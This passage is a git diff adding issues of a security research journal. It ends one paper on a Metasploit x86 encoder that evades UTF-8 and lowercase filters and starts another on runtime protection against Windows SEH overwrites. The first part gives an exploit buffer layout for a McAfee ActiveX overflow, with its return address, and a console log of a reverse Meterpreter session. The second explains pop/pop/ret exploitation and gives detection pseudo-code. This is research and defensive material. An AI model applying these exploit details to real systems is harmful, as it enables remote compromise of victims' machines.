minus the value of the current byte. The value of x is then assigned a +random value between 1 and the difference. The value of y is then calculated +as the current byte plus x plus the carry flag. For example, if the value is +0x24, then the values could be calculated as described in the following +scenario. + +First, the difference between 0x7f and 0x24 is 0x5b. The value of x could be +0x18, as derived from rand(0x5b - 1) + 1. From there, the value of y would be +calculated as 0x3c through 0x24 + 0x18. Therefore, 0x3c - 0x18 is 0x24. + +Given these two methods of calculating the individual byte values, it's +possible to encode all byte with the exception of 0x7f, 0x80, and 0x81. If any +one of these three bytes is encountered, the try_sub routine will return nil +and the encoding will fail. Otherwise, the routine will complete in a fashion +similar to the try_add routine. However, rather than using an add instruction, +it uses the sub instruction. + +4.3) encode_end + + +With all the encoding cruft out of the way, the final method that needs to be +overridden is encode_end. In this method, the state.context attribute is +appended to the state.encoded. The purpose of the state.context attribute is +to hold all of the encoded data blocks that are created over the course of +encoding each block. The state.encoded attribute is the actual decoder +including the stub header, the decode transformations, and finally, the encoded +data blocks. + + +def encode_end(state) + state.encoded += state.context +end + + +Once encoding completes, the result might be a disassembly that looks something +like this: + + +$ echo -ne "\x42\x20\x80\x78\xcc\xcc\xcc\xcc" | \ + ./msfencode -e x86/avoid_utf8_tolower -t raw | \ + ndisasm -u - +[*] x86/avoid_utf8_tolower succeeded, final size 47 + +00000000 6A02 push byte +0x2 +00000002 6B3C240B imul edi,[esp],byte +0xb +00000006 60 pusha +00000007 030C24 add ecx,[esp] +0000000A 6A11 push byte +0x11 +0000000C 030C24 add ecx,[esp] +0000000F 6A04 push byte +0x4 +00000011 683C0C190D push dword 0xd190c3c +00000016 5F pop edi +00000017 0139 add [ecx],edi +00000019 030C24 add ecx,[esp] +0000001C 68696A6060 push dword 0x60606a69 +00000021 5F pop edi +00000022 0139 add [ecx],edi +00000024 030C24 add ecx,[esp] +00000027 06 push es +00000028 1467 adc al,0x67 +0000002A 6B63626C imul esp,[ebx+0x62],byte +0x6c +0000002E 6C insb + + +5) Applying the Encoder + +The whole reason that this encoder was originally needed was to take advantage +of the vulnerability in the McAfee Subscription Manager ActiveX control. Now +that the encoder has been implemented, all that's left is to try it out and see +if it works. To test this against a Windows XP SP0 target, the overflow buffer +might be constructed as follows. + +First, a string of 2972 random text characters must be generated. The return +address should follow the random character string. An example of a valid +return address for this target is 0x7605122f which is the location of a jmp esp +instruction in shell32.dll. Immediately following the return address in the +overflow buffer should be a series of five instructions: + + +00000000 60 pusha +00000001 6A01 push byte +0x1 +00000003 6A01 push byte +0x1 +00000005 6A01 push byte +0x1 +00000007 61 popa + + +The purpose of this series of instructions is to cause the value of esp at the +time that the pusha occurs to be popped into the ecx register. As the reader +should recall, the ecx register is used as the base address for the decoder +stub. However, since esp doesn't actually point to the base address of the +decoder stub, the encoder must be informed that 8 extra bytes must be added to +ecx when accounting for the extra offset into the encoded data blocks. This is +conveyed by setting the BufferOffset value to 8. After these five instructions +should come the encoded version of the payload. To better visualize this, +consider the following snippet from the exploit: + + +buf = + Rex::Text.rand_text(2972, payload_badchars) + + [ ret ].pack('V') + + "\x60" + # pusha + "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1 + "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1 + "\x6a" + Rex::Text.rand_char(payload_badchars) + # push byte 0x1 + "\x61" + # popa + p.encoded + + +With the overflow buffer ready to go, the only thing left to do is fire off the +an exploit attempt by having the machine browse to the malicious website: + + +msf exploit(mcafee_mcsubmgr_vsprintf) > exploit +[*] Started reverse handler +[*] Using URL: http://x.x.x.3:8080/foo +[*] Server started. +[*] Exploit running as background job. +msf exploit(mcafee_mcsubmgr_vsprintf) > +[*] Transmitting intermediate stager for over-sized stage...(89 bytes) +[*] Sending stage (2834 bytes) +[*] Sleeping before handling stage... +[*] Uploading DLL (73739 bytes)... +[*] Upload completed. +[*] Meterpreter session 1 opened (x.x.x.3:4444 -> x.x.x.105:2010) + +msf exploit(mcafee_mcsubmgr_vsprintf) > sessions -i 1 +[*] Starting interaction with 1... + +meterpreter > + + +6) Conclusion + +The purpose of this paper was to illustrate the process of implementing a +customer encoder for the x86 architecture. In particular, the encoder +described in this paper was designed to make it possible to encode payloads in +a UTF-8 and tolower safe format. To help illustrate the usefulness of such an +encoder, a recent vulnerability in the McAfee Subscription Manager ActiveX +control was used because of its restrictions on uppercase characters. While +many readers may never find it necessary to implement an encoder, it's +nevertheless a necessary topic to understand for those who are interested in +exploitation research. + + +A. References + +eEye. McAfee Subscription Manager Stack Buffer Overflow. +http://lists.grok.org.uk/pipermail/full-disclosure/2006-August/048565.html; +accessed Aug 26, 2006. + + +Metasploit Staff. Metasploit 3.0 Developer's Guide. +http://www.metasploit.com/projects/Framework/msf3/developers_guide.pdf; + accessed Aug 26, 2006. + + +Spoonm. Recent Shellcode Developments. +http://www.metasploit.com/confs/recon2005/recent_shellcode_developments-recon05.pdf; +accessed Aug 26, 2006. + + +SkyLined. Alpha 2. +http://www.edup.tudelft.nl/ bjwever/documentation_alpha2.html.php; +accessed Aug 26, 2006. + + + + diff --git a/uninformed/5.2.txt b/uninformed/5.2.txt new file mode 100644 index 0000000..80d4eff --- /dev/null +++ b/uninformed/5.2.txt @@ -0,0 +1,782 @@ +Preventing the Exploitation of SEH Overwrites +9/2006 +skape +mmiller@hick.org + + +1) Foreword + +Abstract: This paper proposes a technique that can be used to prevent +the exploitation of SEH overwrites on 32-bit Windows applications +without requiring any recompilation. While Microsoft has attempted to +address this attack vector through changes to the exception dispatcher +and through enhanced compiler support, such as with /SAFESEH and /GS, +the majority of benefits they offer are limited to image files that have +been compiled to make use of the compiler enhancements. This limitation +means that without all image files being compiled with these +enhancements, it may still be possible to leverage an SEH overwrite to +gain code execution. In particular, many third-party applications are +still vulnerable to SEH overwrites even on the latest versions of +Windows because they have not been recompiled to incorporate these +enhancements. To that point, the technique described in this paper does +not rely on any compile time support and instead can be applied at +runtime to existing applications without any noticeable performance +degradation. This technique is also backward compatible with all +versions of Windows NT+, thus making it a viable and proactive solution +for legacy installations. + +Thanks: The author would like to thank all of the people who have helped +with offering feedback and ideas on this technique. In particular, the +author would like to thank spoonm, H D Moore, Skywing, Richard Johnson, +and Alexander Sotirov. + + +2) Introduction + +Like other operating systems, the Windows operating system finds itself +vulnerable to the same classes of vulnerabilities that affect other +platforms, such as stack-based buffer overflows and heap-based buffer +overflows. Where the platforms differ is in terms of how these +vulnerabilities can be leveraged to gain code execution. In the case of +a conventional stack-based buffer overflow, the overwriting of the +return address is the most obvious and universal approach. However, +unlike other platforms, the Windows platform has a unique vector that +can, in many cases, be used to gain code execution through a stack-based +overflow that is more reliable than overwriting the return address. +This vector is known as a Structured Exception Handler (SEH) overwrite. +This attack vector was publicly discussed for the first time, as far as +the author is aware, by David Litchfield in his paper entitled Defeating +the Stack Based Buffer Overflow Prevention Mechanism of Microsoft +Windows 2003 Server However, exploits had been using this technique +prior to the publication, so it is unclear who originally found the +technique. + +In order to completely understand how to go about protecting against SEH +overwrites, it's prudent to first spend some time describing the +intention of the facility itself and how it can be abused to gain code +execution. To provide this background information, a description of +structured exception handling will be given in section 2.1. Section 2.2 +provides an illustration of how an SEH overwrite can be used to gain +code execution. If the reader already understands how structured +exception handling works and can be exploited, feel free to skip ahead. +The design of the technique that is the focus of this paper will be +described in chapter 3 followed by a description of a proof of concept +implementation in chapter 4. Finally, potential compatibility issues are +noted in chapter 5. + + +2.1) Structured Exception Handling + + +Structured Exception Handling (SEH) is a uninform system for dispatching +and handling exceptions that occur during the normal course of a +program's execution. This system is similar in spirit to the way that +UNIX derivatives use signals to dispatch and handle exceptions, such as +through SIGPIPE and SIGSEGV. SEH, however, is a more generalized and +powerful system for accomplishing this task, in the author's opinion. +Microsoft's integration of SEH spans both user-mode and kernel-mode and +is a licensed implementation of what is described in a patent owned by +Borland. In fact, this patent is one of the reasons why open source +operating systems have not chosen to integrate this style of exception +dispatching. + +In terms of implementation, structured exception handling works by +defining a uniform way of handling all exceptions that occur during the +normal course of process execution. In this context, an exception is +defined as an event that occurs during execution that necessitates some +form of extended handling. There are two primary types of exceptions. +The first type, known as a hardware exception, is used to categorize +exceptions that originate from hardware. For example, when a program +makes reference to an invalid memory address, the processor will raise +an exception through an interrupt that gives the operating system an +opportunity to handle the error. Other examples of hardware exceptions +include illegal instructions, alignment faults, and other +architecture-specific issues. The second type of exception is known as +a software exception. A software exception, as one might expect, +originates from software rather than from the hardware. For example, in +the event that a process attempts to close an invalid handle, the +operating system may generate an exception. + +One of the reasons that the word structured is included in structured +exception handling is because of the fact that it is used to dispatch +both hardware and software exceptions. This generalization makes it +possible for applications to handle all types of exceptions using a +common system, thus allowing for greater application flexibility when it +comes to error handling. + +The most important detail of SEH, insofar as it pertains to this +document, is the mechanism through which applications can dynamically +register handlers to be called when various types of exceptions occur. +The act of registering an exception handler is most easily described as +inserting a function pointer into a chain of function pointers that are +called whenever an exception occurs. Each exception handler in the +chain is given the opportunity to either handle the exception or pass it +on to the next exception handler. + +At a higher level, the majority of compiler-generated C/C++ functions +will register exception handlers in their prologue and remove them in +their epilogue. In this way, the exception handler chain mirrors the +structure of a thread's stack in that they are both LIFOs +(last-in-first-out). The exception handler that was registered last +will be the first to be removed from the chain, much the same as last +function to be called will be the first to be returned from. + +To understand how the process of registering an exception handler +actually works in practice, it makes sense to analyze code that makes +use of exception handling. For instance, the code below illustrates what +would be required to catch all exceptions and then display the type of +exception that occurred: + + +__try +{ + ... +} __except(EXCEPTION_EXECUTE_HANDLER) +{ + printf("Exception code: %.8x\n", GetExceptionCode()); +} + +In the event that an exception occurs from code inside of the try / except +block, the printf call will be issued and GetExceptionCode will return the +actual exception that occurred. For instance, if code made reference to an +invalid memory address, the exception code would be 0xc0000005, or +EXCEPTION_ACCESS_VIOLATION. To completely understand how this works, it is +necessary to dive deeper and take a look at the assembly that is generated from +the C code described above. When disassembled, the code looks something like +what is shown below: + + +00401000 55 push ebp +00401001 8bec mov ebp,esp +00401003 6aff push 0xff +00401005 6818714000 push 0x407118 +0040100a 68a4114000 push 0x4011a4 +0040100f 64a100000000 mov eax,fs:[00000000] +00401015 50 push eax +00401016 64892500000000 mov fs:[00000000],esp +0040101d 83c4f4 add esp,0xfffffff4 +00401020 53 push ebx +00401021 56 push esi +00401022 57 push edi +00401023 8965e8 mov [ebp-0x18],esp +00401026 c745fc00000000 mov dword ptr [ebp-0x4],0x0 +0040102d c6050000000001 mov byte ptr [00000000],0x1 +00401034 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff +0040103b eb2b jmp ex!main+0x68 (00401068) +0040103d 8b45ec mov eax,[ebp-0x14] +00401040 8b08 mov ecx,[eax] +00401042 8b11 mov edx,[ecx] +00401044 8955e4 mov [ebp-0x1c],edx +00401047 b801000000 mov eax,0x1 +0040104c c3 ret + +0040104d 8b65e8 mov esp,[ebp-0x18] +00401050 8b45e4 mov eax,[ebp-0x1c] +00401053 50 push eax +00401054 6830804000 push 0x408030 +00401059 e81b000000 call ex!printf (00401079) +0040105e 83c408 add esp,0x8 +00401061 c745fcffffffff mov dword ptr [ebp-0x4],0xffffffff +00401068 8b4df0 mov ecx,[ebp-0x10] +0040106b 64890d00000000 mov fs:[00000000],ecx +00401072 5f pop edi +00401073 5e pop esi +00401074 5b pop ebx +00401075 8be5 mov esp,ebp +00401077 5d pop ebp +00401078 c3 ret + + +The actual registration of the exception handler all occurs behind the scenes +in the C code. However, in the assembly code, the registration of the +exception handler starts at 0x0040100a and spans four instructions. It is +these four instructions that are responsible for registering the exception +handler for the calling thread. The way that this actually works is by +chaining an EXCEPTION_REGISTRATION_RECORD to the front of the list of exception +handlers. The head of the list of already registered exception handlers is +found in the ExceptionList attribute of the NT_TIB structure. If no exception +handlers are registered, this value will be set to 0xffffffff. The NT_TIB +structure makes up the first part of the TEB, or Thread Environment Block, +which is an undocumented structure used internally by Windows to keep track of +per-thread state in user-mode. A thread's TEB can be accessed in a +position-independent fashion by referencing addresses relative to the fs +segment register. For example, the head of the exception list chain be be +obtained through fs:[0]. + +To make sense of the four assembly instructions that register the custom +exception handler, each of the four instructions will be described +individually. For reference purposes, the layout of the +EXCEPTION_REGISTRATION_RECORD is described below: + + + +0x000 Next : Ptr32 _EXCEPTION_REGISTRATION_RECORD + +0x004 Handler : Ptr32 + + +1. push 0x4011a4 + + The first instruction pushes the address of the CRT generated excepthandler3 + symbol. This routine is responsible for dispatching general exceptions that + are registered through the except compiler intrinsic. The key thing to note + here is that the virtual address of a function is pushed onto the stack that is + excepted to be referenced in the event that an exception is thrown. This push + operation is the first step in dynamically constructing an + EXCEPTION_REGISTRATION_RECORD on the stack by first setting the Handler + attribute. + +2. mov eax,fs:[00000000] + + The second instruction takes the current pointer to the first + EXCEPTION_REGISTRATION_RECORD and stores it in eax. + +3. push eax + + The third instruction takes the pointer to the first exception registration + record in the exception list and pushes it onto the stack. This, in turn, sets + the Next attribute of the record that is being dynamically generated on the + stack. Once this instruction completes, a populated + EXCEPTION_REGISTRATION_RECORD will exist on the stack that takes the following + form: + + + +0x000 Next : 0x0012ffb0 + +0x004 Handler : 0x004011a4 ex!_except_handler3+0 + + +4. mov fs:[00000000],esp + + Finally, the dynamically generated exception registration record is stored as + the first exception registration record in the list for the current thread. + This completes the process of inserting a new registration record into the + chain of exception handlers. + + +The important things to take away from this description of exception handler +registration are as follows. First, the registration of exception handlers is +a runtime operation. This means that whenever a function is entered that makes +use of an exception handler, it must dynamically register the exception +handler. This has implications as it relates to performance overhead. Second, +the list of registered exception handlers is stored on a per-thread basis. +This makes sense because threads are considered isolated units of execution and +therefore exception handlers are only relative to a particular thread. The +final, and perhaps most important, thing to take away from this is that the +assembly generated by the compiler to register an exception handler at runtime +makes use of the current thread's stack. This fact will be revisited later in +this section. + +In the event that an exception occurs during the course of normal execution, +the operating system will step in and take the necessary steps to dispatch the +exception. In the event that the exception occurred in the context of a thread +that is running in user-mode, the kernel will take the exception information +and generate an EXCEPTION_RECORD that is used to encapsulate all of the +exception information. Furthermore, a snapshot of the executing state of the +thread is created in the form of a populated CONTEXT structure. The kernel +then passes this information off to the user-mode thread by transferring +execution from the location that the fault occurred at to the address of +ntdll!KiUserExceptionDispatcher. The important thing to understand about this +is that execution of the exception dispatcher occurs in the context of the +thread that generated the exception. + +The job of ntdll!KiUserExceptionDispatcher is, as the name implies, to dispatch +user-mode exceptions. As one might guess, the way that it goes about doing +this is by walking the chain of registered exception handlers stored relative +to the current thread. As the exception dispatcher walks the chain, it calls the +handler associated with each registration record, giving that handler the +opportunity to handle, fail, or pass on the exception. + + +While there are other things involved in the exception dispatching process, +this description will suffice to set the stage for how it might be abused to +gain code execution. + + +2.2) Gaining Code Execution + +There is one important thing to remember when it comes to trying to gain code +execution through an SEH overwrite. Put simply, the fact that each exception +registration record is stored on the stack lends itself well to abuse when +considered in conjunction with a conventional stack-based buffer overflow. As +described in section , each exception registration record is composed of a Next +pointer and a Handler function pointer. Of most interest in terms of +exploitation is the Handler attribute. Since the exception dispatcher makes use +of this attribute as a function pointer, it makes sense that should this +attribute be overwritten with attacker controlled data, it would be possible to +gain code execution. In fact, that's exactly what happens, but with an added +catch. + +While typical stack-based buffer overflows work by overwriting the return +address, an SEH overwrite works by overwriting the Handler attribute of an +exception registration record that has been stored on the stack. Unlike +overwriting the return address, where control is gained immediately upon return +from the function, an SEH overwrite does not actually gain code execution until +after an exception has been generated. The exception is necessary in order to +cause the exception dispatcher to call the overwritten Handler. + +While this may seem like something of a nuisance that would make SEH overwrites +harder to exploit, it's not. Generating an exception that leads to the calling +of the Handler is as simple as overwriting the return address with an invalid +address in most cases. When the function returns, it attempts to execute code +from an invalid memory address which generates an access violation exception. +This exception is then passed onto the exception dispatcher which calls the +overwritten Handler. + +The obvious question to ask at this point is what benefit SEH overwrites have +over the conventional practice of overwriting the return address. To +understand this, it's important to consider one of the common practices +employed in Windows-based exploits. On Windows, thread stack addresses tend to +change quite frequently between operating system revisions and even across +process instances. This differs from most UNIX derivatives where stack +addresses are typically predictable across multiple operating system revisions. +Due to this fact, most Windows-based exploits will indirectly transfer control +into the thread's stack by first bouncing off an instruction that exists +somewhere in the address space. This instruction must typically reside at an +address that is less prone to change, such as within the code section of a +binary. The purpose of this instruction is to transfer control back to the +stack in a position-independent fashion. For example, a jmp esp instruction +might be used. While this approach works perfectly fine, it's limited by +whether or not an instruction can be located that is both portable and reliable +in terms of the address that it resides at. This is where the benefits of SEH +overwrites begin to become clear. + +When simply overwriting the return address, an attacker is often limited to a +small set of instructions that are not typically common to find at a reliable +and portable location in the address space. On the other hand, SEH overwrites +have the advantage of being able to use another set of instructions that are +far more prevalent in the address space of most every process. This set of +instructions is commonly referred to as pop/pop/ret. The reason this class of +instructions can be used with SEH overwrites and not general stack overflows +has to do with the method in which exception handlers are called by the +exception dispatcher. To understand this, it is first necessary to know what +the specific prototype is for the Handler field in the +EXCEPTION_REGISTRATION_RECORD structure: + + +typedef EXCEPTION_DISPOSITION (*ExceptionHandler)( + IN EXCEPTION_RECORD ExceptionRecord, + IN PVOID EstablisherFrame, + IN PCONTEXT ContextRecord, + IN PVOID DispatcherContext); + + +The field of most importance is the EstablisherFrame. This field actually +points to the address of the exception registration record that was pushed onto +the stack. It is also located at [esp+8] when the Handler is called. +Therefore, if the Handler is overwritten with the address of a pop/pop/ret +sequence, the result will be that the execution path of the current thread will +be transferred to the address of the Next attribute for the current exception +registration record. While this field would normally hold the address of the +next registration record, it instead can hold four bytes of arbitrary code that +an attacker can supply when triggering the SEH overwrite. Since there are only +four contiguous bytes of memory to work with before hitting the Handler field, +most attackers will use a simple short jump sequence to jump past the handler +and into the attacker controlled code that comes after it. + + +3) Design + +The one basic requirement of any solution attempting to prevent the leveraging +of SEH overwrites is that it must not be possible for an attacker to be able to +supply a value for the Handler attribute of an exception registration record +that is subsequently used in an unchecked fashion by the exception dispatcher +when an exception occurs. If a solution can claim to have satisfied this +requirement, then it should be true that the solution is secure. + +To that point, Microsoft's solution is secure, but only if all of the images +loaded in the address space have been compiled with /SAFESEH. Even then, it's +possible that it may not be completely secure For example, it should be +possible to overwrite the Handler with the address of some non-image associated +executable region, if one can be found. If there are any images that have not +been compiled with /SAFESEH, it may be possible for an attacker to overwrite +the Handler with an address of an instruction that resides within an +unprotected image. The reason Microsoft's implementation cannot protect +against this is because SafeSEH works by having the exception dispatcher +validate handlers against a table of image-specific safe exception handlers +prior to calling an exception handler. Safe exception handlers are stored in a +table that is contained in any executable compiled with /SAFESEH. Given this +limitation, it can also be said that Microsoft's implementation is not secure +given the appropriate conditions. In fact, for third-party applications, and +even some Microsoft-provided applications, these conditions are considered by +the author to be the norm rather than the exception. In the end, it all boils +down to the fact that Microsoft's solution is a compile-time solution rather +than a runtime solution. With these limitations in mind, it makes sense to +attempt to approach the problem from the angle of a runtime solution rather +than a compile-time solution. + +When it comes to designing a runtime solution, the important consideration that +has to be made is that it will be necessary to intercept exceptions before they +are passed off to the registered exception handlers by the exception +dispatcher. The particulars of how this can be accomplished will be discussed +in chapter . Assuming a solution is found to the layering problem, the next +step is to come up with a solution for determining whether or not an exception +handler is valid and has not been tampered with. While there are many +inefficient solutions to this problem, such as coming up with a solution to +keep a ``secure'' list of registered exception handlers, there is one solution +in particular that the author feels is bested suited for the problem. + +One of the side effects of an SEH overwrite is that the attacker will typically +clobber the value of the Next attribute associated with the exception +registration record that is overwritten. This occurs because the Next +attribute precedes the Handler attribute in memory, and therefore must be +overwritten before the Handler in the case of a typical buffer overflow. This +has a very important side effect that is the key to facilitating the +implementation of a runtime solution. In particular, the clobbering of the +Next attribute means that all subsequent exception registration records would +not be reachable by the exception dispatcher when walking the chain. + +Consider for the moment a solution that, during thread startup, places a custom +exception registration record as the very last exception registration record in +the chain. This exception registration record will be symbolically referred to +as the validation frame henceforth. From that point forward, whenever an +exception is about to be dispatched, the solution could walk the chain prior to +allowing the exception dispatcher to handle the exception. The purpose of +walking the chain before hand is to ensure that the validation frame can be +reached. As such, the validation frame's purpose is similar to that of stack +canaries. If the validation frame can be reached, then that is evidence of the +fact that the chain of exception handlers has not been corrupted. As described +above, the act of overwriting the Handler attribute also requires that the Next +pointer be overwritten. If the Next pointer is not overwritten with an address +that ensures the integrity of the exception handler chain, then this solution +can immediately detect that the integrity of the chain is in question and +prevent the exception dispatcher from calling the overwritten Handler. + +Using this technique, the act of ensuring that the integrity of the exception +handler chain is kept intact results in the ability to prevent SEH overwrites. +The important questions to ask at this point center around what limitations +this solution might have. The most obvious question to ask is what's to stop +an attacker from simply overwriting the Next pointer with the value that was +already there. There are a few things that stop this. First of all, it will +be common that the attacker does not know the value of the Next pointer. +Second, and perhaps most important, is that one of the benefits of using an SEH +overwrite is that an attacker can make use of a pop/pop/ret sequence. By +forcing an attacker to retain the value of the Next pointer, the major benefit +of using an SEH overwrite in the first place is gone. Even conceding this +point, an attacker who is able to retain the value of the Next pointer would +find themselves limited to overwriting the Handler with the address of +instructions that indirectly transfer control back to their code. However, the +attacker won't simply be able to use an instruction like jmp esp because the +Handler will be called in the context of the exception dispatcher. It's at +this point that diminishing returns are reached and an attacker is better off +simply overwriting the return address, if possible. + +Another important question to ask is what's to stop the attacker from +overwriting the Next pointer with the address of the validation frame itself +or, more easily, with 0xffffffff. The answer to this is much the same as +described in the above paragraph. Specifically, by forcing an attacker away +from the pop/pop/ret sequence, the usefulness of the SEH overwrite vector +quickly degrades to the point of it being better to simply overwrite the return +address, if possible. However, in order to be sure, the author feels that +implementations of this solution would be wise to randomize the location of the +validation frame. + +It is the author's opinion that the solution described above satisfies the +requirement outlined in the beginning of this chapter and therefore qualifies +as a secure solution. However, there's always a chance that something has been +missed. For that reason, the author is more than happy to be proven wrong on +this point. + + +4) Implementation + +The implementation of the solution described in the previous chapter relies on +intercepting exceptions prior to allowing the native exception dispatcher to +handle them such that the exception handler chain can be validated. First and +foremost, it is important to identify a way of layering prior to the point that +the exception dispatcher transfers control to the registered exception +handlers. There are a few different places that this layering could occur at, +but the one that is best suited to catch the majority of user-mode exceptions +is at the location that ntdll!KiUserExceptionDispatcher gains control. +However, by hooking ntdll!KiUserExceptionDispatcher, it is possible that this +implementation may not be able to intercept all cases of an exception being +raised, thus making it potentially feasible to bypass the exception handler +chain validation. + +The best location would be to layer at would be ntdll!RtlDispatchException. The +reason for this is that exceptions raised through ntdll!RtlRaiseException, such +as software exceptions, may be passed directly to ntdll!RtlDispatchException +rather than going through ntdll!KiUserExceptionDispatcher first. The condition +that controls this is whether or not a debugger is attached to the user-mode +process when ntdll!RtlRaiseException is called. The reason +ntdll!RtlDispatchException is not hooked in this implementation is because it +is not directly exported. There are, however, fairly reliable techniques that +could be used to determine its address. As far as the author is aware, the act +of hooking ntdll!KiUserExceptionDispatcher should mean that it's only possible +to miss software exceptions which are much harder, and in most cases +impossible, for an attacker to generate. + +In order to layer at ntdll!KiUserExceptionDispatcher, the first few +instructions of its prologue can be overwritten with an indirect jump to a +function that will be responsible for performing any sanity checks necessary. +Once the function has completed its sanity checks, it can transfer control back +to the original exception dispatcher by executing the overwritten instructions +and then jumping back into ntdll!KiUserExceptionDispatcher at the offset of the +next instruction to be executed. This is a nice and ``clean'' way of +accomplishing this and the performance overhead is miniscule Where ``clean'' is +defined as the best it can get from a third-party perspective. + +In order to hook ntdll!KiUserExceptionDispatcher, the first n instructions, +where n is the number of instructions that it takes to cover at least 6 bytes, +must be copied to a location that will be used by the hook to execute the +actual ntdll!KiUserExceptionDispatcher. Following that, the first n +instructions of ntdll!KiUserExceptionDispatcher can then be overwritten with an +indirect jump. This indirect jump will be used to transfer control to the +function that will validate the exception handler chain prior to allowing the +original exception dispatcher to handle the exception. + +With the hook installed, the next step is to implement the function that will +actually validate the exception handler chain. The basic steps involved in +this are to first extract the head of the list from fs:[0] and then iterate +over each entry in the list. For each entry, the function should validate that +the Next attribute points to a valid memory location. If it does not, then the +chain can be assumed to be corrupt. However, if it does point to valid memory, +then the routine should check to see if the Next pointer is equal to the +address of the validation frame that was previously stored at the end of the +exception handler chain for this thread. If it is equal to the validation +frame, then the integrity of the chain is confirmed and the exception can be +passed to the actual exception dispatcher. + +However, if the function reaches an invalid Next pointer, or it reaches +0xffffffff without encountering the validation frame, then it can assume that +the exception handler chain is corrupt. It's at this point that the function +can take whatever steps are necessary to discard the exception, log that a +potential exploitation attempt occurred, and so on. The end result should be +the termination of either the thread or the process, depending on +circumstances. This algorithm is captured by the pseudo-code below: + + +01: CurrentRecord = fs:[0]; +02: ChainCorrupt = TRUE; +03: while (CurrentRecord != 0xffffffff) { +04: if (IsInvalidAddress(CurrentRecord->Next)) +05: break; +06: if (CurrentRecord->Next == ValidationFrame) { +07: ChainCorrupt = FALSE; +08: break; +09: } +10: CurrentRecord = CurrentRecord->Next; +11: } +12: if (ChainCorrupt == TRUE) +13: ReportExploitationAttempt(); +14: else +15: CallOriginalKiUserExceptionDispatcher(); + + +The above algorithm describes how the exception dispatching path should be +handled. However, there is one important part remaining in order to implement +this solution. Specifically, there must be some way of registering the +validation frame with a thread prior to any exceptions being dispatched on that +thread. There are a few ways that this can be accomplished. In terms of a +proof of concept, the easiest way of doing this is to implement a DLL that, +when loaded into a process' address space, catches the creation notification of +new threads through a mechanism like DllMain or through the use of a TLS +callback in the case of a statically linked library. Both of these approaches +provide a location for the solution to establish the validation frame with the +thread early on in its execution. However, if there were ever a case where the +thread were to raise an exception prior to one of these routines being called, +then the solution would improperly detect that the exception handler chain was +corrupt. + +One solution to this potential problem is to store state relative to each +thread that keeps track of whether or not the validation frame has been +registered. There are certain implications about doing this, however. First, +it could introduce a security problem in that an attacker might be able to +bypass the protection by somehow toggling the flag that tracks whether or not +the validation frame has been registered. If this flag were to be toggled to +no and an exception were generated in the thread, then the solution would have +to assume that it can't validate the chain because no validation frame has been +installed. Another issue with this is that it would require some location to +store this state on a per-thread basis. A good example of a place to store +this is in TLS, but again, it has the security implications described above. + +A more invasive solution to the problem of registering the validation frame +would be to somehow layer very early on in the thread's execution -- perhaps +even before it begins executing from its entry point. The author is aware of a +good way to accomplish this, but it will be left as an exercise to the reader +on what this might be. This more invasive solution is something that would be +an easy and elegant way for Microsoft to include support for this, should they +ever choose to do so. + +The final matter of how to go about implementing this solution centers around +how it could be deployed and used with existing applications without requiring +a recompile. The easiest way to do this in a proof of concept setting would be +to implement these protection mechanisms in the form of a DLL that can be +dynamically loaded into the address space of a process that is to be protected. +Once loaded, the DLL's DllMain can take care of getting everything set up. A +simple way to cause the DLL to be loaded is through the use of AppInitDLLs, +although this has some limitations. Alternatively, there are more invasive +options that can be considered that will accomplish the goal of loading and +initializing the DLL early on in process creation. + +One interesting thing about this approach is that while it is targeted at being +used as a runtime solution, it can also be used as a compile-time solution. +This means that applications can use this solution at compile-time to protect +themselves from SEH overwrites. Unlike Microsoft's solution, this will even +protect them in the presence of third-party images that have not been compiled +with the support. This can be accomplished through the use of a static library +that uses TLS callbacks to receive notifications when threads are created, much +like DllMain is used for DLL implementations of this solution. + +All things considered, the author believes that the implementation described +above, for all intents and purposes, is a fairly simplistic way of providing +runtime protection against SEH overwrites that has minimal overhead. While the +implementation described in this document is considered more suitable for a +proof-of-concept or application-specific solution, there are real-world +examples of more robust implementations, such as in Wehnus's WehnTrust product, +a commercial side-project of the author's. Apologies for the shameless plug. + + +5) Compatibility + +Like most security solutions, there are always compatibility problems that must +be considered. As it relates to the solution described in this paper, there +are a couple of important things to keep in mind. + +The first compatibility issue that might happen in the real world is a scenario +where an application invalidates the exception handler chain in a legitimate +fashion. The author is not currently aware of situations where an application +would legitimately need to do this, but it has been observed that some +applications, such as cygwin, will do funny things with the exception handler +chain that are not likely to play nice with this form of protection. In the +event that an application invalidates the exception handler chain, the solution +described in this paper may inadvertently detect that an SEH overwrite has +occurred simply because it is no longer able to reach the validation frame. + +Another compatibility issue that may occur centers around the fact that the +implementation described in this paper relies on the hooking of functions. In +almost every situation it is a bad idea to use function hooking, but there are +often situations where there is no alternative, especially in closed source +environments. The use of function hooking can lead to compatibility problems +with other applications that also hook ntdll!KiUserExceptionDispatcher. There +may also be instances of security products that detect the hooking of +ntdll!KiUserExceptionDispatcher and classify it as malware-like behavior. In +any case, these compatibility concerns center less around the fundamental +concept and more around the specific implementation that would be required of a +third-party. + + +6) Conclusion + +Software-based vulnerabilities are a common problem that affect a wide array of +operating systems. In some cases, these vulnerabilities can be exploited with +greater ease depending on operating system specific features. One particular +case of where this is possible is through the use of an SEH overwrite on 32-bit +applications on the Windows platform. An SEH overwrite involves overwriting the +Handler associated with an exception registration record. Once this occurs, an +exception is generated that results in the overwritten Handler being called. +As a result of this, the attacker can more easily gain control of code +execution due to the context that the exception handler is called in. + +Microsoft has attempted to address the problem of SEH overwrites with +enhancements to the exception dispatcher itself and with solutions like SafeSEH +and the /GS compiler flag. However, these solutions are limited because they +require a recompilation of code and therefore only protect images that have +been compiled with these flags enabled. This limitation is something that +Microsoft is aware of and it was most likely chosen to reduce the potential for +compatibility issues. + +To help solve the problem of not offering complete protection against SEH +overwrites, this paper has suggested a solution that can be used without any +code recompilation and with negligible performance overhead. The solution +involves appending a custom exception registration record, known as a +validation frame, to the end of the exception list early on in thread startup. +When an exception occurs in the context of a thread, the solution intercepts +the exception and validates the exception handler chain for the thread by +making sure that it can walk the chain until it reaches the validation frame. +If it is able to reach the validation frame, then the exception is dispatched +like normal. However, if the validation frame cannot be reached, then it is +assumed that the exception handler chain is corrupt and that it's possible that +an exploit attempt may have occurred. Since exception registration records are +always prepended to the exception handler chain, the validation frame is +guaranteed to always be the last handler. + +This solution relies on the fact that when an SEH overwrite occurs, the Next +attribute is overwritten before overwriting the Handler attribute. Due to the +fact that attackers typically use the Next attribute as the location at which +to store a short jump, it is not possible for them to both retain the integrity +of the 